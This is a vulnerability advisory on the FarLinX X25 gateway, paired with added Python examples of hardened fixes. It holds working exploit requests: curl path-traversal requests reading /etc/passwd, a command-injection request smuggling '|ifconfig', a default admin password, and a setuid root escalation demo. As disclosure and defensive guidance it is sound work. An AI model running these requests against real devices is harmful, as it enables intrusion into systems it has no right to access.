JAHx164 - FarLinX X25 gateway multiple vulnerabilities
These vulnerabilities were discovered by Eldar "Wireghoul" Marcussen.
About
The FarLinX X25 Gateway is the answer for handling all your X.25 to TCP/IP migration requirements. Featuring routing between TCP and X.25, TCP and XOT, X.25 and XOT, data conversion, a Triple-X PAD, Host PAD, an extension for special POS protocols and even an X.25 switch all at a very affordable cost, the FarLinX X25 Gateway fits the bill for TCP/IP to X.25 interconnection. -- http://www.farsite.com/
Fixed username allows easier brute-forcing
The device has a default login of "admin" with the password "farlinx". While it does allow the password to be changed, the username is hardcoded in the device's Apache configuration and cannot be changed.
CVE-2014-7175 - Arbitrary write
The file 'fsSaveUIPersistence.php' writes user-supplied data to the file 'fsUI.xyz' with minimal changes. This can be used to place attacker-controlled code on the file system. This can easily be identified by examining the file source:
<?php
//Receive data from client
$strReceivedata = $_REQUEST['strSubmitData'];
//replace some chars
//$strReceivedata = preg_replace("/(\r\n|\n|\r)/", "\n", $strReceivedata);
//$strReceivedata = preg_replace("/\\\/", "", $strReceivedata);
//error_log($strReceivedata);
$pFile = fopen("fsUI.xyz", "w+");
if(fwrite($pFile, $strReceivedata) == false)
{
error_log("fail to save data to file");
}
fclose($pFile);
//error_log("Finished Running PHP");
?>
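The defect in the script above is that the request body reaches fopen()/fwrite() unchanged, into a file that sits inside the web root. The following is an added example of how a hardened handler would treat the same input, written in Python rather than the device's PHP; it is not the vendor's code. The key=value grammar, the size limit and the idea of a state directory outside the served tree are assumptions, since the advisory does not document the real format of fsUI.xyz.

```python
import os
import re
import tempfile

# Constructed grammar for the persisted UI settings: one "key=value" pair per
# line, ASCII only, bounded size. The real format of fsUI.xyz is not documented
# in the advisory, so this allowlist is an assumption; the point is that the
# server decides the shape of what it writes, not the client.
_LINE_RE = re.compile(r"^[A-Za-z0-9_]{1,32}=[A-Za-z0-9_ .,:-]{0,128}$")
MAX_BODY = 4096


def validate_ui_data(body: str) -> bool:
    """True only if the body is non-empty, bounded, and every line matches
    the key=value grammar (so a PHP open tag or binary can never pass)."""
    if not body or len(body) > MAX_BODY:
        return False
    return all(_LINE_RE.fullmatch(line) for line in body.splitlines())


def save_ui_data(body: str, state_dir: str) -> str:
    """Write validated settings to a fixed name inside state_dir, which should
    sit outside any directory Apache serves or executes. A temp file plus
    rename means a failed write never leaves a half-written file behind."""
    if not validate_ui_data(body):
        raise ValueError("rejected UI persistence data")
    final = os.path.join(state_dir, "fsUI.xyz")
    fd, tmp = tempfile.mkstemp(dir=state_dir, prefix=".fsUI.")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(body)
        os.chmod(tmp, 0o600)
        os.replace(tmp, final)
    except Exception:
        if os.path.exists(tmp):
            os.unlink(tmp)
        raise
    return final


def demo_roundtrip():
    """Constructed demo: a benign body is stored and read back, then a body
    carrying a PHP open tag is refused. Returns (refused, stored_text)."""
    state_dir = tempfile.mkdtemp()
    path = save_ui_data("theme=dark\nlang=en", state_dir)
    with open(path) as fh:
        stored = fh.read()
    try:
        save_ui_data("<?php echo 'injected'; ?>", state_dir)
        refused = False
    except ValueError:
        refused = True
    return refused, stored
```

Two things matter more than the exact grammar: the file name and location are fixed by the server rather than influenced by the client, and the directory is one the web server neither serves nor executes, so even a validation bypass yields a data file, not a script.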
CVE-2014-7174 - Multiple directory traversal
There are several PHP scripts based around log handling that are vulnerable to directory traversal. The following examples are provided:
curl -u admin:farlinx -k -d 'viewFilesName=../../../../../../../../etc/passwd' https://host/sysZipTranLogFileShow.php
curl -u admin:farlinx -k -d 'savefileNames=../../../../../etc/passwd' https://host/sysSaveEventLog.php
curl -u admin:farlinx -k -d 'saveFilesName=../../../../../etc/passwd' https://host/sysSaveTransacLog.php
curl -u admin:farlinx -k -d 'zipfileName=../../../../../etc/passwd' https://host/sysZipLogFileShow.php
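Each of the four requests above passes a user-chosen file name straight into a file operation. The following is an added example (Python, not the gateway's PHP and not the vendor's fix) of resolving such a name safely: a lexical allowlist on the name itself, then a containment check on the resolved path. The log directory path is a hypothetical placeholder, and the sample values are constructed from the parameter names the advisory lists.

```python
import os
import re
from typing import Optional

# Hypothetical log directory; the advisory does not say where the gateway
# keeps its logs. Names must be a single path component of safe characters
# starting with a letter or digit, so "..", "/", and leading dots never pass.
LOG_DIR = "/var/log/x25gw"
_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def resolve_log_path(requested: str, base_dir: str = LOG_DIR) -> Optional[str]:
    """Return an absolute path under base_dir, or None if the request must be
    refused. The regex rejects traversal lexically; the realpath/commonpath
    check is an independent guard that also catches a symlink inside the
    directory pointing elsewhere once the file exists."""
    if not _NAME_RE.fullmatch(requested):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed inputs keyed by the parameter names from the advisory's examples.
SAMPLE_REQUESTS = {
    "viewFilesName": "../../../../../../../../etc/passwd",
    "savefileNames": "../../../../../etc/passwd",
    "saveFilesName": "etc/passwd",
    "zipfileName": "tranlog-2014-09-30.log",
}


def triage(requests: dict) -> dict:
    """Resolve every requested name; None marks a request that was refused."""
    return {param: resolve_log_path(value) for param, value in requests.items()}
```

The containment check alone is not enough when the handler later hands the name to a shell (for example to zip a log), which is why the allowlist on characters comes first: it also removes the metacharacters that matter in the command-injection section below.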
CVE-2014-7173 - Command injection
Several command injection vulnerabilities were identified in the following scripts: sysSaveMonitorData.php, fsx25MonProxy.php, syseditdate.php, iframeupload.php and sysRestoreX25Cplt.php. The following example is provided:
curl -u admin:farlinx 'http://host/fsx25MonProxy.php?strSubmitData=start+|ifconfig'
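The request above works because the strSubmitData value is spliced into a shell command line. The added example below (Python, not the device's code) shows the structural fix: map the request value to one of a few fixed actions and execute an argv list with no shell, so "|" and friends are never interpreted. The real monitor control binary is not named in the advisory, so a stand-in that simply prints the action is used in its place.

```python
import subprocess
import sys
from typing import List, Optional

# Stand-in for the gateway's monitor control tool (hypothetical): the Python
# interpreter printing the action it received, so the example runs offline.
_MONITOR_TOOL = [sys.executable, "-c", "import sys; print('x25mon', sys.argv[1])"]

# Only exact tokens are accepted; anything else is refused before execution.
ALLOWED_ACTIONS = {"start", "stop", "status"}


def build_command(user_value: str) -> Optional[List[str]]:
    """Map the request value to an argv list, or None if it is not exactly
    one allowlisted token. Because the command is an argv list executed
    without a shell, metacharacters have no meaning even if they slip
    through, but the allowlist refuses them outright anyway."""
    action = user_value.strip()
    if action not in ALLOWED_ACTIONS:
        return None
    return _MONITOR_TOOL + [action]


def run_action(user_value: str) -> str:
    """Execute the mapped command and return its trimmed stdout, or the
    string 'refused' when the value did not map to an allowed action."""
    argv = build_command(user_value)
    if argv is None:
        return "refused"
    completed = subprocess.run(
        argv, capture_output=True, text=True, check=True, timeout=10
    )
    return completed.stdout.strip()
```

Note that "start |ifconfig" (the URL-decoded value from the advisory's request) is refused by the allowlist, and that even a value like "start" reaches the tool as a separate argv element rather than as text a shell parses.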
Privilege escalation
The file /http/bin/execCmd is a setuid binary that takes a command to run with elevated privileges as a command line argument. The following example shows this in effect:
$ id
uid=99(nobody) gid=101(nobody) groups=101(nobody)
$ /http/bin/execCmd id
uid=0(root) gid=101(nobody) groups=101(nobody)
Cross Site Request Forgery
Almost every one of the URLs provided in this advisory is exploitable through CSRF. No CSRF-specific proof of concept is provided beyond the URLs listed above.
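The requests in this advisory authenticate with HTTP basic auth, which browsers attach automatically, so a state-changing handler needs its own proof that the request came from a page the gateway served. The added example below (Python, not the vendor's code) issues and verifies an HMAC-based anti-CSRF token bound to the session identifier and a timestamp; the session identifier scheme and the token lifetime are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Constructed server-side secret; a real deployment generates this once at
# install time and keeps it outside the web root.
SERVER_SECRET = secrets.token_bytes(32)
MAX_AGE_SECONDS = 3600


def _mac(session_id: str, ts: int, secret: bytes) -> str:
    return hmac.new(secret, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()


def issue_token(session_id: str, secret: bytes = SERVER_SECRET,
                now: Optional[int] = None) -> str:
    """Token the server embeds in each form (or hands out for an
    X-CSRF-Token header). It is stateless: the server recomputes the MAC
    on verification instead of storing tokens."""
    ts = int(time.time()) if now is None else now
    return f"{ts}:{_mac(session_id, ts, secret)}"


def verify_token(token: str, session_id: str, secret: bytes = SERVER_SECRET,
                 max_age: int = MAX_AGE_SECONDS, now: Optional[int] = None) -> bool:
    """Accept only a well-formed, unexpired token whose MAC matches this
    session. compare_digest keeps the comparison constant-time."""
    try:
        ts_str, mac = token.split(":", 1)
        ts = int(ts_str)
    except ValueError:
        return False
    current = int(time.time()) if now is None else now
    if ts > current or current - ts > max_age:
        return False
    return hmac.compare_digest(mac, _mac(session_id, ts, secret))


def handle_post(form: dict, session_id: str, now: Optional[int] = None) -> str:
    """Gate for any state-changing handler: refuse unless the submitted
    token verifies for the caller's session. Returns a short outcome."""
    if not verify_token(form.get("csrf_token", ""), session_id, now=now):
        return "refused"
    return "accepted"
```

A cross-site form cannot read the token from the gateway's own pages, so it cannot supply a value that verifies, while legitimate forms rendered by the gateway carry a fresh one.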
Posted by Eldar Marcussen | Filed under: security, exploit, bug, advisory, vulnerability, disclosure